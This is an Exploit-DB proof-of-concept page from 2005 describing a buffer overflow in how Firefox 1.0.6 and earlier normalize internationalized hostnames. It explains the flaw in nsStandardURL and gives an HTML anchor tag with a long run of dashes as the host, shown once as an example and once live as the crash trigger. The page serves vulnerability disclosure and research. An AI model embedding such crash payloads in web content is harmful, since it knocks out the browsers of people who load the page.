Mozilla Products - 'Host:' Buffer Overflow (Denial of Service) (PoC) String

EDB-ID:

1204

CVE:

N/A

EDB Verified:

Author:

Tom Ferris

Type:

dos

Exploit:   /  

Platform:

Multiple

Date:

2005-09-09

Vulnerable App: 
<!--

Mozilla Firefox <= 1.0.6 (Host:) Buffer Overflow DoS String
Formatted for your tesing /str0ke

Tom Ferris
www.security-protocols.com

Versions Affected:
Firefox Win32 1.0.6 and prior
Firefox Linux 1.0.6 and prior
Firefox 1.5 Beta 1 (Deer Park Alpha 2)

Technical Details:
The problem seems to be when a hostname which has all dashes causes the
NormalizeIDN call in nsStandardURL::BuildNormalizedSpec to return true,
but is sets encHost to an empty string.  Meaning, Firefox appends 0 to
approxLen and then appends the long string of dashes to the buffer
instead.  The following HTML code below will reproduce this issue:

String:
<A HREF=https:--------------------------------------------- >

-->

<A HREF=https:­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ >

# milw0rm.com [2005-09-09]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services